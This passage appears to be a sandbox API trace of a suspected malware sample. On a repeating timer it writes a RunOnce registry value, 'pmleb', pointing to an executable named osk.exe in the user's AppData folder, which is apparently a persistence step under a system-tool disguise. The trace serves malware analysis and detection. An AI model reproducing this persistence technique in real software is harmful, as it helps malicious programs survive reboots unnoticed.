[0099.785] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.799] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.799] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.799] KillTimer (hWnd=0x20280, uIDEvent=0x2335) returned 1 [0099.799] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.800] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.800] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.800] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.800] RegCloseKey (hKey=0x280) returned 0x0 [0099.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.801] SetTimer (hWnd=0x20280, nIDEvent=0x2336, uElapse=0xa, lpTimerFunc=0x0) returned 0x2336 [0099.801] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.845] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.845] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.846] KillTimer (hWnd=0x20280, uIDEvent=0x2336) returned 1 [0099.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.850] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.850] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.851] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.851] RegCloseKey (hKey=0x280) returned 0x0 [0099.851] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.851] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.851] SetTimer (hWnd=0x20280, nIDEvent=0x2337, uElapse=0xa, lpTimerFunc=0x0) returned 0x2337 [0099.851] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.861] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.861] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.861] KillTimer (hWnd=0x20280, uIDEvent=0x2337) returned 1 [0099.862] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.862] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.862] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.862] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.863] RegCloseKey (hKey=0x280) returned 0x0 [0099.863] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.863] SetTimer (hWnd=0x20280, nIDEvent=0x2338, uElapse=0xa, lpTimerFunc=0x0) returned 0x2338 [0099.863] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0099.877] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.877] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.877] KillTimer (hWnd=0x20280, uIDEvent=0x2338) returned 1 [0099.877] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.878] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.878] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.878] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.878] RegCloseKey (hKey=0x280) returned 0x0 [0099.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.878] SetTimer (hWnd=0x20280, nIDEvent=0x2339, uElapse=0xa, lpTimerFunc=0x0) returned 0x2339 [0099.878] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.895] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.895] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.895] KillTimer (hWnd=0x20280, uIDEvent=0x2339) returned 1 [0099.896] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.896] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.896] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.896] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.896] RegCloseKey (hKey=0x280) returned 0x0 [0099.897] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.897] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.897] SetTimer (hWnd=0x20280, nIDEvent=0x233a, uElapse=0xa, lpTimerFunc=0x0) returned 0x233a [0099.897] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.908] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.908] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.908] KillTimer (hWnd=0x20280, uIDEvent=0x233a) returned 1 [0099.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.909] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.909] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.910] RegCloseKey (hKey=0x280) returned 0x0 [0099.910] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.910] SetTimer (hWnd=0x20280, nIDEvent=0x233b, uElapse=0xa, lpTimerFunc=0x0) returned 0x233b [0099.910] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.923] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.923] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.924] KillTimer (hWnd=0x20280, uIDEvent=0x233b) returned 1 [0099.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.924] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.924] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.925] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.925] RegCloseKey (hKey=0x280) returned 0x0 [0099.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.925] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.925] SetTimer (hWnd=0x20280, nIDEvent=0x233c, uElapse=0xa, lpTimerFunc=0x0) returned 0x233c [0099.925] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.939] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.939] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.939] KillTimer (hWnd=0x20280, uIDEvent=0x233c) returned 1 [0099.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.940] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.940] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.940] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.940] RegCloseKey (hKey=0x280) returned 0x0 [0099.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.941] SetTimer (hWnd=0x20280, nIDEvent=0x233d, uElapse=0xa, lpTimerFunc=0x0) returned 0x233d [0099.941] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.955] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.955] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.955] KillTimer (hWnd=0x20280, uIDEvent=0x233d) returned 1 [0099.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.955] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.956] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.956] RegCloseKey (hKey=0x280) returned 0x0 [0099.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.956] SetTimer (hWnd=0x20280, nIDEvent=0x233e, uElapse=0xa, lpTimerFunc=0x0) returned 0x233e [0099.956] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.980] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.980] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.980] KillTimer (hWnd=0x20280, 
uIDEvent=0x233e) returned 1 [0099.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.981] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.981] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.981] RegCloseKey (hKey=0x280) returned 0x0 [0099.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.981] SetTimer (hWnd=0x20280, nIDEvent=0x233f, uElapse=0xa, lpTimerFunc=0x0) returned 0x233f [0099.981] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.986] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.986] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.986] KillTimer (hWnd=0x20280, uIDEvent=0x233f) returned 1 [0099.986] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.987] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.987] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.987] RegCloseKey (hKey=0x280) returned 0x0 [0099.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.987] SetTimer (hWnd=0x20280, nIDEvent=0x2340, uElapse=0xa, lpTimerFunc=0x0) returned 0x2340 [0099.987] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.002] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.002] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.002] KillTimer (hWnd=0x20280, uIDEvent=0x2340) returned 1 [0100.002] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.003] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.003] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.003] RegCloseKey (hKey=0x280) returned 0x0 [0100.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.003] SetTimer (hWnd=0x20280, nIDEvent=0x2341, uElapse=0xa, lpTimerFunc=0x0) returned 0x2341 [0100.003] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.019] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.019] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.019] KillTimer (hWnd=0x20280, uIDEvent=0x2341) returned 1 [0100.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.019] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.020] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.020] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.020] RegCloseKey (hKey=0x280) returned 0x0 [0100.020] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.020] SetTimer (hWnd=0x20280, nIDEvent=0x2342, uElapse=0xa, lpTimerFunc=0x0) returned 0x2342 [0100.020] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.033] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.033] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.033] KillTimer (hWnd=0x20280, uIDEvent=0x2342) returned 1 [0100.033] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.033] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.034] RegCloseKey (hKey=0x280) returned 0x0 
[0100.034] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.034] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.034] SetTimer (hWnd=0x20280, nIDEvent=0x2343, uElapse=0xa, lpTimerFunc=0x0) returned 0x2343 [0100.034] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.048] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.048] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.048] KillTimer (hWnd=0x20280, uIDEvent=0x2343) returned 1 [0100.049] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.049] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.049] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.049] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.050] RegCloseKey (hKey=0x280) returned 0x0 [0100.050] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.050] SetTimer (hWnd=0x20280, nIDEvent=0x2344, uElapse=0xa, lpTimerFunc=0x0) returned 0x2344 [0100.050] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.064] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.064] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.064] KillTimer (hWnd=0x20280, uIDEvent=0x2344) returned 1 [0100.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.065] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.065] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.065] RegCloseKey (hKey=0x280) returned 0x0 [0100.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.065] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.066] SetTimer (hWnd=0x20280, nIDEvent=0x2345, uElapse=0xa, lpTimerFunc=0x0) returned 0x2345 [0100.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.107] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.107] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.108] KillTimer (hWnd=0x20280, uIDEvent=0x2345) returned 1 [0100.109] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.115] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.115] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.115] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.116] RegCloseKey (hKey=0x280) returned 0x0 [0100.116] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.116] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.116] SetTimer (hWnd=0x20280, nIDEvent=0x2346, uElapse=0xa, lpTimerFunc=0x0) returned 0x2346 [0100.116] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.127] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.127] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.127] KillTimer (hWnd=0x20280, uIDEvent=0x2346) returned 1 [0100.127] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.127] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.128] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.128] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.128] RegCloseKey (hKey=0x280) returned 0x0 [0100.128] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.128] SetTimer (hWnd=0x20280, nIDEvent=0x2347, uElapse=0xa, lpTimerFunc=0x0) returned 0x2347 [0100.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.145] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.145] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.145] KillTimer (hWnd=0x20280, uIDEvent=0x2347) returned 1 [0100.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.146] RegCreateKeyExA (in: hKey=0x80000001, 
